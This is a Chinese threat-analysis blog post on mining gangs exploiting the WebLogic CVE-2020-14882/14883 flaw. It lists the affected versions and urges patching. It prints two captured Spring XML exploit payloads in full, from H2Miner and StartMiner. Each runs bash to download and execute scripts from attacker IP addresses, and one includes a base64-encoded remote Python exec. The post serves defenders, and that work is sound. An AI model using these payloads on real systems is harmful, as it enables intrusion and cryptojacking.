背景
近期Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的EXP的面世,使得个挖矿团伙迅速展开了各种基于该漏洞的攻击活动。
详情
漏洞EXP复现
漏洞具体EXP复现可参考下面文章,主要有两种方式。其中第二种方式又多个团伙的样本。
https://blog.csdn.net/weixin_41598660/article/details/109409965
1.H2Miner
其中payload 如下所示:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>/bin/bash</value> <value>-c</value> <value><![CDATA[(curl -s 95.142.39.135/wb.sh||wget -q -O- 95.142.39.135/wb.sh)|bash]]></value> </list> </constructor-arg> </bean> </beans>
详细分析可查看(https://mp.weixin.qq.com/s/JPm71AI-CeeRmoZwEl34bg)
2.StartMiner
其payload文件(http://205.185.116.78/poc.xml)如下所示:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>/bin/bash</value> <value>-c</value> <value>curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms</value> </list> </constructor-arg> </bean> </beans>
3.z0Miner
详情见https://s.tencent.com/research/report/1170.html, paylaod 样本链接(http://189.7.105.47:8181/examples/jsp/z0.txt)已经无法下载
4.MSASCMiner
详情见MSASCMiner
总结
目前,随着漏洞EXP的更新,随即小黑们也会及时的更新最近的攻击手段,大家及时检查weblogic版本,打好补丁。
受影响的版本
10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
漏洞修复
此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。
注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。
来源:freebuf.com 2020-11-12 16:35:20 by: ArseneLupin
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册